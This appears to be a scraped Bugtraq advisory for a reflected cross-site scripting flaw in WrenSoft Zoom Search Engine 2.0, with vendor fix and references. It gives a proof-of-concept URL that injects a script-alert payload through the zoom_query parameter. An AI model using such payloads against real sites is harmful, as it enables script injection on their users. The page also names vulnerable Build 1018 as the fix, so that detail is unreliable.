WrenSoft Zoom Search Engine Cross-Site Scripting Vulnerability
BID:8823
Info
WrenSoft Zoom Search Engine Cross-Site Scripting Vulnerability
| Bugtraq ID: | 8823 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 14 2003 12:00AM |
| Updated: | May 31 2007 04:21PM |
| Credit: | Discovery of this vulnerability has been credited to Ezhilan. |
| Vulnerable: |
WRENSOFT Zoom Search Engine 2.0 Build: 1018 Adiscon WinSyslog 4.21 SP1 |
| Not Vulnerable: |
WRENSOFT Zoom Search Engine 2.0 Build: 1019 |
Discussion
Exploit / POC
WrenSoft Zoom Search Engine Cross-Site Scripting Vulnerability
The following proof of concept has been supplied:
http://www.example.com/search.php?zoom_query=<script>alert("hello")</script><script>alert("hello")</script>
The following proof of concept has been supplied:
http://www.example.com/search.php?zoom_query=<script>alert("hello")</script><script>alert("hello")</script>
Solution / Fix
WrenSoft Zoom Search Engine Cross-Site Scripting Vulnerability
Solution:
The vendor has released an upgrade to address this issue:
WRENSOFT Zoom Search Engine 2.0 Build: 1018
Solution:
The vendor has released an upgrade to address this issue:
WRENSOFT Zoom Search Engine 2.0 Build: 1018
-
WRENSOFT zoomsearch.exe
http://www.wrensoft.com/ftp/zoomsearch.exe
References
WrenSoft Zoom Search Engine Cross-Site Scripting Vulnerability
References:
References:
- Zoom Search Engine Homepage (WRENSOFT)